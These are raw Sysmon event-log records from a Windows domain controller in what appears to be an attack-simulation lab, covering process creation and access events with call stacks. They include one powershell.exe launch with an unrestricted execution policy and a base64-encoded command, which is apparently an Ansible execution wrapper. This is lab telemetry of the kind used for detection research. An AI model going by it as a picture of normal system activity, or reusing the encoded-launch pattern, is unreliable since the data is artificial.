13:52:23.149{10ACEC4A-8517-5FCF-C402-000000009001}41562496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8517-5FCF-C502-000000009001}4488C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd272522(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc71312c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc712dfd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd1c46e2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6d3993(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc731e62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7154c7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7154c7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc715358(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7072dd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc713810(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc713403(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc71312c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc712dfd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd1c46e2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6f9c5e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6f922e(wow64) 154100x8000000000000000116Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.150{10ACEC4A-8517-5FCF-C502-000000009001}4488C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8516-5FCF-1C60-100000000000}0x10601c0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.134{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000114Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.134{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000113Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.134{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000112Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.087{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000111Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.087{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000110Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.040{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_dosye3ai.rhs.ps12020-12-08 13:52:23.040 10341000x8000000000000000109Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.040{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000108Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-8516-5FCF-C102-000000009001}42764564C:\Windows\system32\conhost.exe{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000107Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000106Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000105Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000104Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000103Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000102Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000097Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.009{10ACEC4A-8516-5FCF-C302-000000009001}47604248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd222516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c3120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c2df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd1746d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc683987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6e1e56(wow64)|C:\Windows\assembly\Native